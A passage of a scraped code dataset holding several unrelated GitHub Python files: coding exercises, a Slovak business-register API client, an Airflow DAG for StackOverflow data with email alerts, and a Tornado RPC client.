i in range(n):\n a,b,c = map(int, input().split())\n arr.append((a,b,c))\n\n# sorting the tuples based on the deadlines!\nfor i in range(n):\n for j in range(n-1):\n if arr[j][1] <= arr[j+1][1]:\n arr[j],arr[j+1] = arr[j+1],arr[j]\n\nlast_index = 0\nlast_profit = 0\n\nfor i in range(n):\n if arr[i][1] >= m:\n m = arr[i][1]\n\n if arr[i][1] >= m:\n profit += arr[i][2]\n count += 1\n last_index = i\n last_profit = arr[i][2]\n\nfor i in range(last_index+1,n):\n if arr[i][2] > last_profit:\n last_profit = arr[i][2]\n count += 1\n\nprint(count,last_profit+profit)","repo_name":"rupeshmohanty/Competitive-programming-problems","sub_path":"Python/GeeksforGeeks/Greedy/jobSequencing.py","file_name":"jobSequencing.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"152090767","text":"import json\nimport requests\nimport csv\nimport pandas as pd\nimport datetime\nfrom . import config\nimport asyncio\nimport aiohttp\nfrom aiohttp import ClientSession\nimport time\n\n\n\nasync def get_one(session:ClientSession,URL=None,params=None): \n '''\n Worker function for aiohttp requests\n Parameters:\n CienSession session = generated session check docs at: https://docs.aiohttp.org/en/stable/http_request_lifecycle.html#aiohttp-request-lifecycle\n str URL = URL to make request\n dict params = dictionary of parameters to use\n Return:\n dictionary of data from JSON response\n or Raised error, if some problems with communication or requests\n '''\n try:\n response = await session.request(method='GET', url=URL,params=params)\n response.raise_for_status()\n# print(f\"Response status ({URL}): {response.status}\")\n response_json = await response.json()\n return response_json\n except requests.exceptions.HTTPError as errh:\n raise RuntimeError(errh)\n except requests.exceptions.ConnectionError as errc:\n raise RuntimeError(errc)\n except requests.exceptions.Timeout as errt:\n raise RuntimeError(errt)\n except requests.exceptions.RequestException as err:\n raise RuntimeError(err)\n except json.decoder.JSONDecodeError:\n raise RuntimeError('RegisterUZ get_data: server response is not JSON')\n except Exception as err:\n raise RuntimeError(f\"An error ocurred: {err}\")\n\n\nasync def get_data(URL=None,params=None, IDlist=None):\n '''\n Get data from server - faster version\n Parameters:\n str URL = URL usually it is BASE_URL+SPECIFIC_PART_OF_API\n dict params = dictionary of parameters to pass with URL\n list IDlist = list of ID to get from server, If not used (None) there will be only one request with params\n Return:\n list of dict of collected data\n if used with IDlist=None, one dict in list, to access use index 0\n if used with IDlist, number of dictionaries will be length of IDlist\n '''\n if URL is None or params is None:\n raise ValueError('RegisterUZ get_data: Missing URL or parameters')\n elif IDlist is None:\n# connector = aiohttp.TCPConnector(limit=10)\n async with aiohttp.ClientSession() as session:\n tasks = []\n# for url in urls:\n task = asyncio.ensure_future(get_one(session=session,URL=URL,params=params))\n tasks.append(task)\n res = await asyncio.gather(*tasks,return_exceptions=True)\n return res\n elif IDlist is not None:\n connector = aiohttp.TCPConnector(limit_per_host=100)\n async with aiohttp.ClientSession(connector=connector) as session:\n tasks = []\n for i in IDlist:\n task = asyncio.ensure_future(get_one(session=session,URL=URL,params={\"id\":i}))\n tasks.append(task)\n res = await asyncio.gather(*tasks,return_exceptions=True)\n return res\n\n# old version, not used\ndef get_data_old(URL=None,params=None):\n '''\n Use to get data from RegisterUZ - not used, is slower for big datasets\n Parameters:\n str URL = URL which will accept GET request\n dict params = dictionary of parameters for specific API call\n Return:\n response of data in JSON format or will raise an error\n '''\n if URL is None or params is None:\n raise ValueError('RegisterUZ get_data: Missing URL or parameters')\n else:\n try:\n response = requests.get(url = URL, params = params, timeout=5)\n response.raise_for_status()\n return response.json()\n\n except requests.exceptions.HTTPError as errh:\n raise RuntimeError(errh)\n except requests.exceptions.ConnectionError as errc:\n raise RuntimeError(errc)\n except requests.exceptions.Timeout as errt:\n raise RuntimeError(errt)\n except requests.exceptions.RequestException as err:\n raise RuntimeError(err)\n except json.decoder.JSONDecodeError:\n raise RuntimeError('RegisterUZ get_data: server response is not JSON')\n\ndef write_csv(data, name=\"output\",writing=None, columns=None):\n '''\n Use to save json data to CSV file\n Parameters:\n dict data = data to write\n str name = name of file to which save data e.g. 'uctovne_jednotky', without extension\n '''\n if isinstance(name, int):\n name = str(name)\n if writing is None or columns is None:\n raise ValueError('RegisterUZ write_csv: Missing parameter: writing')\n elif writing is 'one':\n df = pd.DataFrame([data],columns=columns)\n df.to_csv(name+'.csv',sep=';',index=False,encoding='utf-8-sig')\n elif writing is 'list': \n df = pd.DataFrame(data,columns=columns)\n df.to_csv(name+'.csv',sep=';',index=False,encoding='utf-8-sig')\n \n elif writing is 'df': \n data.to_csv(name+'.csv',sep=';',index=False,encoding='utf-8-sig')\n \n\n \ndef is_int(val):\n '''\n Use to check if param val is numeric or not\n Parameters:\n anytype val = data to check\n Return:\n False = if conversion fails (not numeric data) \n True = val is numeric data\n '''\n try:\n num = int(val)\n except ValueError:\n return False\n return True \n\n\ndef uctovna_jednotka(id=0, csv_file=True):\n '''\n Get info about company by ID\n Parameters:\n str or int id = ID of company in database e.g. 302525\n bool csv_file = True to save data into csv with id name e.g. 302525.csv, False to get JSON data\n Return:\n None = No information for this ID\n JSON = information in JSON format if csv_file = False\n '''\n if id is 0:\n raise ValueError('RegisterUZ uctovna jednotka: Missing parameter: id')\n input_params = {\"id\":id}\n d = asyncio.run(get_data(config.BASE_URL+config.UCTOVNA_JEDNOTKA,input_params))\n d = d[0]\n# d = get_data_old(config.BASE_URL+config.UCTOVNA_JEDNOTKA,input_params)\n \n if 'stav' in d:\n if d['stav'] == config.UCTOVNA_JEDNOTKA_STATUS_DELETED:\n print(f'Returned data for ID: {id} are: {d[\"stav\"]} ')\n return None\n if d is not None and csv_file:\n write_csv(d,name=id,writing=\"one\", columns=config.UCTOVNA_JEDNOTKA_NAMES)\n print(f'CSV was created with name {id}.csv')\n elif d is not None and not csv_file:\n print(f'Returning data associated with ID {id} ')\n return d\n return None\n \n \ndef uctovne_jednotky_id_list(params=None):\n '''\n Use only in function uctovne_jednotky\n Use to get list of IDs based on params\n Parameters:\n dict = dictionary of parameters to filter data\n Return:\n List of IDs returned from API based on params\n '''\n if params is not None:\n res = []\n d = asyncio.run(get_data(config.BASE_URL+config.UCTOVNE_JEDNOTKY,params))\n d = d[0]\n# d = get_data(config.BASE_URL+config.UCTOVNE_JEDNOTKY,params)\n res = d[\"id\"]\n if d[\"existujeDalsieId\"]:\n maxval = max(d[\"id\"])\n params[\"pokracovat-za-id\"] = maxval\n params[\"max-zaznamov\"] = 10000\n result = uctovne_jednotky_id_list(params)\n res.extend(result)\n return res\n elif not d[\"existujeDalsieId\"]:\n return res\n \n \ndef uctovne_jednotky(zmenene_od=None,pokracovat_za_id=None,max_zaznamov=None,ico=None,dic=None,pravna_forma=None,csv_file=True,csv_name='dataset'):\n '''\n Use to get data about companies, based on parameters\n Parameters:\n str zmenene_od = start date to filter data formats: '%Y-%m-%d', '%Y-%m-%dT%H:%M:%S%z' e.g. '2015-01-01'\n str pokracovat_za_id = optional parameter, start filter from some ID e.g. '1'\n str max_zaznamov = optional parameter, number of ID to get back from request, number in range 1,10000 e.g. '100'\n str ico = optional parameter, (Identifikačné čislo organizácie) Identification number of company in SK e.g. '00691135'\n str dic = optional parameter, (Daňové identifikačté číslo) Tax identification number in SK e.g. '2020216748'\n str pravna_forma = ID of type of object e.g. '601' list at https://www.registeruz.sk/cruz-public/api/pravne-formy\n bool csv_file= True, create csv with filtered objects, False will return only list of IDs from DB\n str csv_name = name of dataset which will be created, default is 'dataset'\n Return:\n list of IDs if param csv_file is set to False or nothing, if csv_file=True to create csv file\n '''\n params = {}\n\n # check zmenene_od\n if zmenene_od is not None: \n valid_time = 0\n for f in config.DATE_TIME_FORMATS:\n try:\n date = datetime.datetime.strptime(zmenene_od, f)\n valid_time+=1\n except ValueError as err:\n pass\n# print(err)\n if valid_time is not 0: \n params[\"zmenene-od\"] = zmenene_od\n else: \n raise ValueError('RegisterUZ uctovne_jednotky: zmenene_od is mandatory or incorrect')\n# params[\"zmenene-od\"] = config.DEFAULT_DATE\n# print(f'Parameter zmenene_od={zmenene_od} nie je spravny')\n# print(f'Skontroluj spravnost alebo')\n# print(f'pouzi jeden z {config.DATE_TIME_FORMATS} formatov')\n# print(f'Hodnota zmenene_od bola nastavena na {config.DEFAULT_DATE}')\n\n # check pokracovat_za_id \n if pokracovat_za_id is not None:\n if is_int(pokracovat_za_id):\n params[\"pokracovat-za-id\"] = pokracovat_za_id\n\n \n # check max_zaznamov\n if max_zaznamov is not None:\n if is_int(max_zaznamov):\n check = lambda x: x > 1 and x <= 10000\n if check(int(max_zaznamov)): \n params[\"max-zaznamov\"] = max_zaznamov\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: max_zaznamov is incorrect')\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: max_zaznamov is incorrect')\n # check ico\n if ico is not None:\n if isinstance(ico,str) and is_int(ico) and len(ico)==8:\n params[\"ico\"] = ico\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: ico is incorrect')\n \n # check dic\n if dic is not None:\n if isinstance(dic,str) and is_int(dic) and len(dic)==10:\n params[\"dic\"] = dic\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: dic is incorrect')\n \n # check pravna_forma\n if pravna_forma is not None:\n if isinstance(pravna_forma,str) and is_int(pravna_forma):\n params[\"pravna-forma\"] = pravna_forma\n else:\n raise ValueError('RegisterUZ uctovne_jednotky: pravna_forma is incorrect')\n \n \n\n # get list of ID to retrieve data for them\n idlist = uctovne_jednotky_id_list(params)\n # if list is empty\n if not idlist: raise ValueError('RegisterUZ uctovne_jednotky: No data found for specified filters')\n \n# print(f'Data of length {len(idlist)} with smallest ID {min(idlist)} and biggest ID {max(idlist)}')\n # some data to save\n if csv_file:\n print(f'Downloading...')\n s = time.time()\n d = asyncio.run(get_data(config.BASE_URL+config.UCTOVNA_JEDNOTKA,params={},IDlist=idlist))\n \n # pop deleted ID from list, if object was deleted, records looks like https://www.registeruz.sk/cruz-public/api/uctovna-jednotka?id=1956418\n # simply filter records which do not have key 'stav'\n d = [i for i in d if not 'stav' in i]\n\n e = time.time()\n write_csv(d,name=csv_name,writing=\"list\",columns=config.UCTOVNE_JEDNOTKY_NAMES)\n \n print(f'Downloaded in: {e-s:.2f} seconds')\n print(f'CSV was created with name {csv_name}.csv and {len(d)} records')\n\n # slower, not used\n# s = time.time()\n# dataset = []\n# for i in idlist:\n# tmp = uctovna_jednotka(i, csv_file=False)\n# if tmp is not None:\n# dataset.append(tmp)\n# e = time.time()\n# write_csv(dataset,name=\"uctovne_jednotky_data\",writing=\"ujlist\")\n else: \n print(f'Returning sorted list of {len(idlist)} numbers')\n return idlist\n \n \n \n \n##\n## CISELNIKY\n##\ndef pravne_formy(csv_file=True):\n '''\n Get data of: pravne_formy\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.PRAVNE_FORMY,{}))\n if csv_file:\n print(f'returning pravne_formy.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='pravne_formy',writing=\"list\",columns=config.PRAVNE_FORMY_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n\ndef sk_nace(csv_file=True):\n '''\n Get data of: sk_nace\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.SK_NACE,{}))\n if csv_file:\n print(f'returning sk_nace.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='sk_nace',writing=\"list\",columns=config.SK_NACE_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef druhy_vlastnictva(csv_file=True):\n '''\n Get data of: druhy_vlastnictva\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.DRUHY_VLASTNICTVA,{}))\n if csv_file:\n print(f'returning druhy_vlastnictva.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='druhy_vlastnictva',writing=\"list\",columns=config.DRUHY_VLASTNICTVA_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n\ndef velkosti_organizacie(csv_file=True):\n '''\n Get data of: velkosti_organizacie\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.VELKOSTI_ORGANIZACIE,{}))\n if csv_file:\n print(f'returning velkosti_organizacie.csv')\n data = data[0]['klasifikacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='velkosti_organizacie',writing=\"list\",columns=config.VELKOSTI_ORGANIZACIE_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef kraje(csv_file=True):\n '''\n Get data of: kraje\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.KRAJE,{}))\n if csv_file:\n print(f'returning kraje.csv')\n data = data[0]['lokacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='kraje',writing=\"list\",columns=config.KRAJE_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef okresy(csv_file=True):\n '''\n Get data of: okresy\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.OKRESY,{}))\n if csv_file:\n print(f'returning okresy.csv')\n data = data[0]['lokacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nadradenaLokacia':d['nadradenaLokacia'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='okresy',writing=\"list\",columns=config.OKRESY_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n \ndef sidla(csv_file=True):\n '''\n Get data of: sidla\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n data = asyncio.run(get_data(config.BASE_URL+config.SIDLA,{}))\n if csv_file:\n print(f'returning sidla.csv')\n data = data[0]['lokacie']\n data = sorted(data, key = lambda i: i['kod'])\n flat = [{'kod':d['kod'],'nadradenaLokacia':d['nadradenaLokacia'],'nazovSK':d['nazov']['sk'],'nazovEN':d['nazov']['en'] }for d in data]\n \n write_csv(flat,name='sidla',writing=\"list\",columns=config.SIDLA_NAMES)\n else:\n print(f'returning json data')\n return data[0]\n \n\ndef zdroje_dat(csv_file=True):\n '''\n Get data of: zdroje_dat, no API available\n Exists only in config file, from https://www.registeruz.sk/cruz-public/home/api#datasources\n Parameters:\n bool csv_file = if you want csv file use True, if want raw JSON use False, default is True\n Return:\n if csv_file is True no return, CSV was created\n if csv_file is False return list of dictionaries\n '''\n if csv_file:\n print(f'returning zdroje_dat.csv')\n write_csv(config.ZDROJE_DAT_TABLE,name='zdroje_dat',writing=\"list\",columns=config.ZDROJE_DAT_NAMES)\n else:\n print(f'returning json data')\n return config.ZDROJE_DAT_TABLE\n ","repo_name":"EObch/project","sub_path":"registeruz/registeruz.py","file_name":"registeruz.py","file_ext":"py","file_size_in_byte":18905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33763579051","text":"from airflow.models import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.email import send_email\nfrom datetime import timedelta, datetime\nfrom stackoverflow.get_today_questions import get_today_question_id, parse_question_data\nfrom stackoverflow.load_today_question_data import save_data_to_csv\nfrom stackoverflow.api_keys import STACKOVERFLOW_API_KEY\n\n\nEMAIL = [\"minjiwoo@megazone.com\", \"mjwoo001@gmail.com\"]\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2023,11,20),\n 'email' : EMAIL,\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=1)\n}\n\ndef success_email_function(context):\n dag_run = context.get(\"dag_run\")\n msg = \"DAG ran successfully.\"\n subject = f\"DAG {dag_run} has completed\"\n send_email(to=\"minjiwoo@megazone.com\", subject=subject, html_content=msg)\n\ndef failed_email_function(context):\n dag_run = context.get(\"dag+_run\")\n msg = \"DAG failed!.\"\n subject = f\"DAG {dag_run} has failed!\"\n send_email(to=\"minjiwoo@megazone.com\", subject=subject, html_content=msg)\n\nwith DAG(\n dag_id = 'stackoverflow_dag',\n schedule_interval='@daily',\n start_date=datetime(year=2023, month=11, day=20),\n catchup=False,\n on_success_callback=success_email_function,\n on_failure_callback=failed_email_function,\n default_args=default_args\n) as dag:\n task_extract_question_data = PythonOperator(\n task_id='extract_question_data',\n python_callable=get_today_question_id,\n params={'api_key':STACKOVERFLOW_API_KEY},\n provide_context=True\n )\n\n task_transform_question_data = PythonOperator(\n task_id='transform_question_data',\n python_callable=parse_question_data,\n provide_context=True\n )\n\n task_save_csv_data = PythonOperator(\n task_id='save_csv_data',\n python_callable=save_data_to_csv\n )\n\n task_extract_question_data >> task_transform_question_data >> task_save_csv_data\n","repo_name":"freemjstudio/Dashboard-for-Developers","sub_path":"src/dags/stackoverflow_dag.py","file_name":"stackoverflow_dag.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29562753915","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport Queue\nimport functools\nimport threading\nimport traceback\n\nfrom tornado import gen\nfrom tornado.tcpclient import TCPClient\nfrom tornado.ioloop import IOLoop\nfrom tornado.iostream import StreamClosedError\n\nfrom util import CONNECTION_TYPE_IN_REQUEST\nfrom util import BasicConnection, RPCMessage, RPCConnectionError, RPCInputError\nfrom util import log, message_utils\n\n\nclass _ClientContext(object):\n\n def __init__(self, connect_timeout=0.2, request_timeout=2):\n self.connect_timeout = connect_timeout\n self.request_timeout = request_timeout\n\n def set_handler_callback(self, callback):\n self._handler_callback = callback\n\n def get_handler_callback(self):\n return self._handler_callback\n\n\nclass _RPCClientConfig(object):\n def __init__(self, host, port, max_clients=5,\n max_buffer_size=None, max_response_size=None, connect_timeout=0.2):\n self.host = host\n self.port = port\n self.address_str = \"{},{}\".format(self.host, self.port)\n self.max_clients = max_clients\n self.max_buffer_size = max_buffer_size\n self.max_response_size = max_response_size\n self.connect_timeout = connect_timeout\n\n\nclass RPCClient(object):\n\n def __init__(self, host, port, max_clients=5, max_buffer_size=None,\n max_response_size=None, connect_timeout=0.2):\n\n self._io_loop = IOLoop.current()\n self.client_config = _RPCClientConfig(\n host=host,\n port=port,\n max_clients=max_clients,\n max_buffer_size=max_buffer_size,\n max_response_size=max_response_size,\n connect_timeout=connect_timeout\n )\n\n self.tcp_client = TCPClient(io_loop=self._io_loop)\n self._create_new_connection()\n\n def _create_new_connection(self):\n self._connection = _ClientConnection(\n client=self,\n io_loop=self._io_loop)\n self._connection.connect()\n # self._io_loop.start()\n\n def reset_connect(self):\n if self._connection:\n self._connection.close_connection()\n self._create_new_connection()\n\n def ping(self):\n def _func():\n log.warn(\"here!!!!!!!!!!!!!\")\n\n self.fetch(ClientConnectionItem(RPCMessage(CONNECTION_TYPE_IN_REQUEST, \"ping\", \"\"), _func))\n\n def fetch(self, item):\n self._connection.add_item(item)\n\n\nclass _ClientConnection(BasicConnection):\n def __init__(self, client, io_loop=None):\n self.client = client\n self.client_config = client.client_config\n self._io_loop = io_loop or IOLoop.current()\n\n self.stream = None\n self._connection_timeout_handler = None\n self._client_connection_tubes = _ClientConnectionTubes(self, self._io_loop)\n # self._client_connection_tubes.thread.start()\n\n def add_item(self, item):\n self._client_connection_tubes.append(item)\n\n def is_avaliable_stream(self):\n return bool(self.stream is not None and not self.stream.closed())\n\n def set_connection_timeout_handler(self, func):\n self._connection_timeout_handler = func\n\n def _off_connection_timeout_handler(self):\n if self._connection_timeout_handler is not None:\n self._io_loop.remove_timeout(self._connection_timeout_handler)\n self.set_connection_timeout_handler(None)\n\n def connect(self):\n self.set_connection_timeout_handler(self._io_loop.add_timeout(\n deadline=self._io_loop.time() + self.client_config.connect_timeout,\n callback=self._on_connection_timeout))\n\n def _connect():\n return self.client.tcp_client.connect(\n host=self.client_config.host, port=self.client_config.port,\n max_buffer_size=self.client_config.max_buffer_size, callback=self._on_connection_success)\n\n #: tcp_client callback\n self._io_loop.run_sync(_connect)\n\n def _on_connection_timeout(self):\n raise RPCConnectionError(\"Connection Timeout {}\".format(self.client_config.address_str))\n\n def _on_connection_success(self, stream):\n self._off_connection_timeout_handler()\n log.debug(u\"Connection Success {}\".format(self.client_config.address_str))\n\n self.stream = stream\n self.stream.set_close_callback(self._on_connection_close)\n\n # Nagle’s algorithm\n self.stream.set_nodelay(True)\n\n #: test\n self.client.ping()\n\n def _on_connection_close(self):\n log.info(\"Connection Timeout {}\".format(self.client_config.address_str))\n\n def close(self):\n if self.is_avaliable_stream():\n self.stream.close()\n self.stream = None\n\n def communicate(self, item):\n if self.is_avaliable_stream():\n self.stream.write(message_utils.encrypt(item))\n\n\nclass _ClientConnectionTubes(object):\n\n def __init__(self, connection, io_loop=None):\n self.connection = connection\n self._io_loop = io_loop or IOLoop.current()\n self.client_config = self.connection.client_config\n\n self.queue = Queue.Queue(self.client_config.max_clients)\n self.active = {}\n self.waiting = {}\n self.thread = _ConnectionThreadingHandler(self._run_item)\n\n def _on_waiting_timeout(self, key):\n log.debug(\"_on_waiting_timeout : {}\".format(self.waiting[key]))\n connection_item, waiting_timeout_handle = self.waiting[key]\n self.queue.remove((key, connection_item))\n del self.waiting[key]\n\n def _off_waiting_timeout(self, key):\n if key in self.waiting:\n _, func = self.waiting[key]\n if func is not None:\n self._io_loop.remove_timeout(func)\n del self.waiting[key]\n\n def append(self, connection_item):\n key = object()\n self.queue.put_nowait((key, connection_item))\n\n if not len(self.active) < self.client_config.max_clients:\n waiting_timeout_handle = self._io_loop.add_timeout(\n deadline=self._io_loop.time() + self.connection_item.waiting_timeout,\n callback=functools.partial(self._on_waiting_timeout, key))\n else:\n waiting_timeout_handle = None\n\n self.waiting[key] = (connection_item, waiting_timeout_handle)\n\n self._run_item()\n\n def _run_item(self):\n while self.queue and len(self.active) < self.client_config.max_clients:\n log.warn(\"^&^^^^^^^^^^^^^^^^^\")\n key, connection_item = self.queue.get()\n log.warn((key, connection_item))\n if key not in self.waiting:\n continue\n\n log.warn(\"9999999999\")\n self._off_waiting_timeout(key)\n self.active[key] = connection_item\n self._handle_connection_item(connection_item, functools.partial(self._release_connection_item, key))\n\n def _release_connection_item(self, key):\n del self.active[key]\n self._run_item()\n\n def _handle_connection_item(self, connection_item, release_callback):\n connection_item.set_release_callback(release_callback)\n # self._io_loop.run_sync(functools.partial(self._on_sending, connection_item))\n _sending_future = self._on_sending(connection_item)\n self._io_loop.add_future(_sending_future, lambda f: f.result())\n\n @gen.coroutine\n def _on_sending(self, connection_item):\n try:\n\n #: send request\n self._sending_connection_item(connection_item)\n content = yield self._read_message(connection_item)\n log.warn(content)\n\n except Exception:\n traceback.print_exc()\n\n def _sending_connection_item(self, connection_item):\n log.warn((\"_send_request\", connection_item.item.__dict__))\n self.connection.communicate(connection_item.item)\n\n @gen.coroutine\n def _read_message(self, connection_item):\n try:\n\n if not self.connection.is_avaliable_stream():\n log.error(\"Malformed Client Request stream closed\")\n raise gen.Return(False)\n\n #: read header data\n header_data_future = self.connection.stream.read_until_regex(\n regex=message_utils.header_delimiter,\n max_bytes=connection_item.header_max_bytes\n )\n\n if connection_item.header_timeout is None:\n self._header_data = yield header_data_future\n else:\n try:\n self._header_data = yield gen.with_timeout(\n timeout=self._io_loop.time() + connection_item.header_timeout,\n future=header_data_future,\n io_loop=self._io_loop\n )\n except gen.TimeoutError:\n log.error(\"Timeout reading header from {}\".format(self.client_config.address_str))\n raise gen.Return(False)\n\n #: parse header data\n try:\n header_tube = message_utils.parse_header(\n CONNECTION_TYPE_IN_REQUEST, self._header_data)\n\n except RPCInputError as e:\n log.warn(e.error)\n raise gen.Return(False)\n\n self._message.topic = header_tube.topic\n\n #: read body data\n body_data_future = self.connection.stream.read_bytes(\n header_tube.body_len + len(message_utils.body_suffix))\n\n if connection_item.body_timeout is None:\n self._body_data = yield body_data_future\n else:\n try:\n self._body_data = yield gen.with_timeout(\n timeout=self._io_loop.time() + connection_item.body_timeout,\n future=body_data_future,\n io_loop=self._io_loop\n )\n except gen.TimeoutError:\n log.error(\"Timeout reading body from {}\".format(self.client_config.address_str))\n raise gen.Return(False)\n\n #: parse body data\n try:\n body_msg = message_utils.parse_body(self._body_data)\n except RPCInputError as e:\n log.error(e.error)\n raise gen.Return(False)\n\n self._message.body = body_msg\n\n except StreamClosedError:\n raise gen.Return(False)\n raise gen.Return(True)\n\n\nclass _ConnectionThreadingHandler(threading.Thread):\n\n def __init__(self, func, group=None, target=None, name=None):\n super(_ConnectionThreadingHandler, self).__init__(group=group, target=target, name=name)\n self.func = func\n\n def run(self):\n self.func()\n\n\nclass ClientConnectionItem(object):\n\n def __init__(self, item, callback, header_max_bytes=None, header_timeout=None,\n body_max_bytes=None, body_timeout=None, waiting_timeout=0.2):\n assert callback is not None\n\n self.item = item\n self.callback = callback\n self.header_max_bytes = header_max_bytes or 1 * 1024 # 1K\n self.header_timeout = header_timeout or 10 # 10s\n self.body_max_bytes = body_max_bytes or 10 * 1024 * 1024 # 10M\n self.body_timeout = body_timeout\n\n def set_release_callback(self, callback):\n self._release_callback = callback\n\n\nrpc_client = RPCClient(host=\"127.0.0.1\", port=8001)\n","repo_name":"nashuiliang/xtcp","sub_path":"pyxtcp/tcp/tornado/multi_client.py","file_name":"multi_client.py","file_ext":"py","file_size_in_byte":11369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23543254828","text":"#!/bin/python3\n\n### Exercise 3 - The Number to Words Algorithm:\n\n\ndigits = hundreds = {0 : \"zero\", 1 : \"one\", 2 : \"two\", 3 : \"three\", 4 : \"four\", 5 : \"five\", 6 : \"six\", 7 : \"seven\", 8 : \"eight\", 9 : \"nine\"} \nbase_teens = {10 : \"ten\", 11 : \"eleven\", 12 : \"twelve\", 13 : \"thirteen\", 15 : \"fifteen\"}\nbase_tens = {20 : \"twenty\", 30 : \"thirty\", 40 : \"forty\", 50 : \"fifty\"}\n\nbase = {}\nbase.update(digits)\nbase.update(base_teens)\nbase.update(base_tens)\nhundreds.pop(0); # remove 0 from hundreds\n\ndef convert_single_digit(to_convert):\n if to_convert in digits:\n return digits[to_convert]\n\ndef convert_hundreds(to_convert):\n if to_convert in hundreds:\n return hundreds[to_convert]\n\ndef convert_double_digits(to_convert):\n p1 = p2 = \"\"\n \n if to_convert == 0:\n return \"\"\n elif to_convert in base:\n return base[to_convert]\n else:\n # need to derive this part of the number\n s = str(to_convert) # convert to string\n t = int(s[0]) # get tens digit\n o = int(s[1]) # get ones digit\n\n if t >= 6 and t <= 9: # 60 to 90 - these can be derived\n if t in digits:\n p1 = digits[t] + \"ty\" # use digit + 'ty'\n if o != 0: \n p2 = convert_single_digit(o)\n return p1 + \" \" + p2\n elif t*10 in base_tens: # base numbers cant be derived, should be in the dict\n p1 = base_tens[t*10] # \n p2 = convert_single_digit(o) # if this far then o should not be 0, ie. 10, 20, 30, 40, 50 should have been handled earlier\n return p1 + \" \" + p2 \n elif t == 1: # teens not in dict, can be derived\n if o >= 6 and o <= 9:\n p1 = digits[0] + \"teen\"\n return p1\n\ndef num_to_string(number):\n \n rem = return_string = \"\"\n\n # check for actual number that is in base and cannot be derived\n if number in base:\n return base[number]\n \n # not a number in base dict, derive number from digits\n number_as_string = str(number) # split into digits\n \n if number >= 100:\n # check hundreds\n return_string = convert_hundreds(int(number_as_string[0])) + \" hundred\"\n rem = convert_double_digits(int(number_as_string[1:3]))\n if rem != \"\":\n return_string += \" and \" + rem\n\n if number >= 10 and number <= 99: \n return_string = convert_double_digits(int(number_as_string[0:2]))\n\n return return_string\n\n#main loop\nfinish = False\n\nwhile not finish:\n \n value = input (\"Number: \")\n \n if (value == \"-1\"):\n finish = True \n else:\n try:\n value = int(value)\n except ValueError:\n print(\"Invalid input, please try again!\")\n\n print(num_to_string(value)) ","repo_name":"abatista1/aws_restart","sub_path":"Python Challenge/Challenge_Labs/pce3.py","file_name":"pce3.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16374353810","text":"from keras.models import Sequential\nfrom keras.layers import Dense, 